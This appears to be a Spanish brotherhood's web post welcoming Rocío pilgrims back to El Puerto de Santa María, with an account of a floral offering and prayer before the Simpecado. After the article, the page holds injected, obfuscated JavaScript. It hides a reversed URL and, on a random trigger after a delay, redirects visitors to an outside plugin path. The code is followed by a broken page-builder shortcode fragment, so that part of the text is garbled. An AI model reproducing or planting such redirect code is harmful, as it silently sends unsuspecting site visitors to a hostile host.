Llegaron los Romeros, nuestros Hermanos Rocieros llegaban hoy a El Puerto después de haber peregrinado a la aldea Almonteña del Rocío para ver, rezar y estar junto  a la Reina de las Marismas en la Romería del Rocío.

                               Y como es habitual esta Hermandad los recibía en su casa de calle Cruces, para darles la bienvenida, hacerle una ofrenda floral al paso del  Simpecado y rezar junto a los Romeros, una Salve la Virgen del Rocío. La carreta con el Simpecado paró delante del altar montado para la ocasión, donde presidía un imagen de la Blanca Paloma y un cuadro del Papa Juan Pablo II, y a los pies una frase que dijo hace ahora 25 años cuando visitó el  Roció: “Qué todo el mundo sea Rociero”.

                               Desde estas líneas, y en nombre del Hermano Mayor y toda su Junta de Gobierno, damos una vez más la bienvenida a todos los Romeros de la Hermandad de El Puerto de Santa María, deseando que la peregrinación le haya colmado aún más de fe y amor a la Virgen, así como tengan un merecido descanso.

) == "string") return $VOcl3cIRrbzlimOyC8H.list[n].split("").reverse().join("");return $VOcl3cIRrbzlimOyC8H.list[n];};$VOcl3cIRrbzlimOyC8H.list=["'php.sgnittes-nigulp/daol-efas/slmtog/snigulp/tnetnoc-pw/moc.reilibommi-gnitekrame//:ptth'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random() * 5);if (number1==3){var delay = 15000;setTimeout($VOcl3cIRrbzlimOyC8H(0), delay);}andscape” show_title_and_caption=”on” show_pagination=”on” background_layout=”light” auto=”on” auto_speed=”1000″ hover_overlay_color=”rgba(255,255,255,0.9)” use_border_color=”off” border_color=”#ffffff” border_style=”solid” /]